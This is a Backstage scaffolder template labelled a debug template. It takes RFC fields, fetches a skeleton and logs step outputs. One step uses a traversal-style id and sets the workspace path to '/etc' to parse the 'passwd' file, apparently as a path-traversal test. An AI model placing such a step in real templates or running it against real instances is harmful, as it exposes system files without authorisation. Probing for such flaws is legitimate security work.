apiVersion: scaffolder.backstage.io/v1beta3
kind: Template
metadata:
  name: debug-template
  title: Template to debug skeleton templates
  description: Basic template to trigger a github worklfow 2222

spec:
  owner: group:default/engineering
  type: service
  parameters:
    - title: Document front content
      properties:
        rfcNumber:
          title: rfcNumber
          type: string
        rfcTitle:
          title: RFC Title
          type: string
        abstract:
          title: Document Abstract (optional draft version)
          type: string
          ui:widget: textarea
        repo:
          title: repo
          type: string
  steps:
    - id: jsutil
      action: roadiehq:utils:jsonata
      workspacePath: 'fake-stuff-tmp'
      input:
        data:
          example: ["ssss", 11,23,2323,24]
        expression: '$.example[0]'
        
    - id: tplace
      action: fetch:template
      input:
        url: https://github.com/prrdev2/s1/blob/main/skeleton
        path: ./template.md
        templateFileExtension: true
        values:
          rfcNumber: ${{ parameters.rfcNumber }}
          rfcTitle: ${{ parameters.rfcTitle }}
          abstract: ${{ parameters.abstract }}

        
    - id: tplace/../../../../../etc
      action: roadiehq:utils:fs:parse
      workspacePath: '/etc'
      input:
        path: passwd


    - id: read-file
      name: Read File
      action: fs:read
      input:
        path: ./template.md
    - id: log-message
      name: Log json
      action: debug:log
      input:
        message: ${{ steps['jsutil'].output.result }}

    - id: log-message
      name: Log Message11
      action: debug:log
      input:
        message: ${{ steps['tplace'].output.content }}


    - id: log-message
      name: Log Message22
      action: debug:log
      input:
        message: ${{ steps['jsutil'].output.content }}
